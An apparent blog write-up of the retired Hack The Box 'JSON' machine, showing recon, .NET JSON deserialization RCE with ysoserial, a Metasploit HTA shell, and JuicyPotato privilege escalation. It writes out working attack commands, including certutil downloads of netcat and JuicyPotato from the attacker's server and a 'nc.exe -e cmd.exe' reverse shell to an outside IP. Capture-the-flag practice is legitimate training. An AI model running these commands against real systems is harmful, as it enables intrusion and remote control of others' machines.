Hackthebox - Retired - JSON
Recon
As always I start with a simple up/down scan on all TCP ports for a staged scan
nmap -T4 -p- -oX ./nmapb.xml 10.10.10.158
Then I convert the output to HTML
# xsltproc ./nmapb.xml -o ./nmapb.html
That's a lot of open ports
Lets scan just those ports with the -A switch to finger os/services
# nmap -T4 -p21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,4915 -A -oX ./nmapf.xml 10.10.10.158
Then convert that to HTML
# xsltproc ./nmapf.xml -o ./nmapf.html
Looks like we got a windows box with a Filezilla FTP on 21, IIS on 80 and netbios/smb, with RPC on 5985
Let's start poking around.
SMB is open but no shares for anonymous
Same story for FTP
At least 80 is open, there is a page displayed briefly then it redirects to this login page
Same old song for rpc
Dirb found
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 30 21:54:09 2020
URL_BASE: http://10.10.10.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.158/ ----
==> DIRECTORY: http://10.10.10.158/css/
==> DIRECTORY: http://10.10.10.158/files/
==> DIRECTORY: http://10.10.10.158/img/
+ http://10.10.10.158/index.html (CODE:200|SIZE:40163)
==> DIRECTORY: http://10.10.10.158/js/
==> DIRECTORY: http://10.10.10.158/views/
---- Entering directory: http://10.10.10.158/css/ ---- --- Entering directory: http://10.10.10.158/files/ ----
---- Entering directory: http://10.10.10.158/img/ ----
==> DIRECTORY: http://10.10.10.158/img/companies/
---- Entering directory: http://10.10.10.158/js/ ----
---- Entering directory: http://10.10.10.158/views/ ----
---- Entering directory: http://10.10.10.158/img/companies/ ----
Dirbuster found this password.txt file
It also found
/api/token
/api/account
Exploit
So guess what the login creds for the website are??
admin/admin
But more importantly we caught this in burp
eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=;
Let's unpack that base64
# echo "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" | base64 -d
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"
Username: admin
Password: 21232f297a57a5a743894a0e4a801fc3
Cool, so after we auth correctly we get a cookie back that saves our auth session for us.
I tried in the browser going to json.htb/api/account that we found earlier and caught this in burp
If i repeat this same request in burpsuite's repeater we get some json looking data back
So we have a new header present name bearer with the same base64 encoded thing as our cookie. This looks like a call into the API that we can hopefully leverage.
So now we move to see if this is vulnerable to a Deserialization attack.
Here is a write up about deserialization
The idea with json is that you can send and receive data in a specified format. What we are hoping here is the webapp accepts this data without sanitizing or checking it first. Which we can use to get RCE on the box.
There were some talks at blackhat a while back focusing on this attack vector
I found a tool that will format our commands and base64 encode them so we can send a get request to the webapp and hope that it runs our code for us.
This is a windows exe so I had to fire up a windows VM, and build the app from the code using visual studios.
Now that we have the exe let's see what we can do with it
I just want to start with a POC to see if I can get the box to ping my VPN IP
There are 11 different Gadgets we can utilize in the tool to generate our payload
The first thing I did was write out a little batch script to make each of the payloads for me and load them up in burp to see if we get anything back
ysoserial.exe -f BinaryFormatter -g ObjectDataProvider -c "ping 10.10.14.25" -o base64
My batch script generated with the binaryformatter since all the gadgets could use this format. I also base64 encoded it so I could just copy and paste in to burp
Let's set our machine to listen to incoming pings
tcpdump -i tun0 -n icmp
This command basically says listen on my tun0 interface and only let me know about ICMP packets.
So in my repeater, I just copied the outputs from ysoserial in to the bearer header and hit send and waited to see if i got any pings
Here is what the first payload looked like
I tried all 10 ( one of them required an input file )
No love
Looking through the other available formatters that the gadgets can use, one stood out pretty quickly ( don't know why I didn't see it before )
JSon.net we are working with json lets try that one
Only 3 of the gadgets could use this formatter
ObjectDataProvider
WindowsClaimsIdentity
WindowsIdentity
So I generated a new json payload for all three of these gadgets and tried them
The last one is WindowsIdentity….
Well we finally got some love
Yay!!!
Ok looks like we can use this deserialization attack to hopefully get somewhere on this box.
Alright let's use mshta to get us a shell
First we need to setup our msfconsole
Msfconsole
use exploit/windows/misc/hta_server
Let's check our options
Let's set srvhost to our VPN IP
set srvhost 10.10.14.25
I have a feeling this is x64 so let's see what options we have for target.
We want to change this to x64
set target 1
And lets run
Ok there is an lhost we need to set to, one of these days I'll learn how to check this before I execute.
set lhost 10.10.14.25
Run
Oi our port is still open somewhere else, let's change that too
Set lport 4445
Will it run now?
Happy dance!!!
We got a shell
Sessions 1
Let's get that user.txt file
Let's escalate
My plan is to use juicy potato and netcat to get a privileged shell back
First let's serve up potato.exe and nc.exe to the Json.HTB box
# python -m SimpleHTTPServer 8888
This is ran from my payloads directory which contains both juicypotato.exe and nc.exe
Then we use certutil to download the files to the tmp directory on json.htb
C:\tmp>certutil -urlcache -split -f http://10.10.14.25:8888/netcat/nc.exe nc.exe
C:\tmp>certutil -urlcache -split -f http://10.10.14.25:8888/juicypotato.exe potato.exe
Now on json.htb I'll make new bat file that will call my reverse shell to my attacking computer using nc.exe
C:\tmp>echo C:\tmp\nc.exe -e cmd.exe 10.10.14.25 4445 > revshell.bat
Let's setup our nc listener on our attacking machine to grab this connection when we execute on json.htb
Now let's launch potato and have it use the new reverseshell.bat to escalate
C:\tmp>potato.exe -p C:\tmp\revshell.bat -l 4445 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Looks like it worked. Let's check out our nc listener to see if we have the connection
And what user are we now? it should be system according to the potato output
Let's get that root hash now
C:\Users\superadmin\Desktop>type root.txt
type root.txt
3cc8*****************************
Comments
Post a Comment